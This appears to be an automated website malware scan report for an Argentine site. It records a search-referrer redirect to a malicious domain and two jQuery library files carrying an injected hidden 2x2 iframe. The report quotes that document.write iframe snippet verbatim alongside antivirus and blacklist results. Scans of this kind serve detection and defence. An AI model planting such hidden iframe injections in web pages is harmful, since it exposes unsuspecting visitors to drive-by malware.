Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pinksite.com.ar/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pinksite.com.ar Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 03:34:06 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://candice-accola.org/mocf.html?h=620063 Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 228 Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 Set-Cookie2: WS_Tracker=fe60546b.50376e3d51055; path=/ X-Cache: MISS X-Varnish: 2557646088 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pinksite.com.ar/ | 200 OK Content-Length: 12436 Content-Type: text/html | clean |
http://pinksite.com.ar/js/lib/jquery-1.4.2.min.js | 200 OK Content-Length: 72335 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063></iframe>');
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b, e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=620063 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063> | ||
http://pinksite.com.ar/js/lib/jquery.jcarousel.min.js | 200 OK Content-Length: 15811 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063></iframe>');
(function(g){var q={vertical:!1,rtl:!1,start:1,offset:1,size:null,scroll:3,visible:null,animation:"normal",easing:"swing",auto:0,wrap:null,initCallback:null,setupCallback:null,reloadCallback:null,itemLoadCallback:null,itemFirstInCallback:null,itemFirstOutCallback:null,itemLastInCallback:null,itemLastOutCallback:null, Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=620063 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063> | ||
http://pinksite.com.ar/<?= $link ?> | 404 Not Found Content-Length: 202 Content-Type: text/html | clean |
http://pinksite.com.ar/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pinksite.com.ar
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pinksite.com.ar/
Result: pinksite.com.ar is not infected or malware details are not published yet.
Result: pinksite.com.ar is not infected or malware details are not published yet.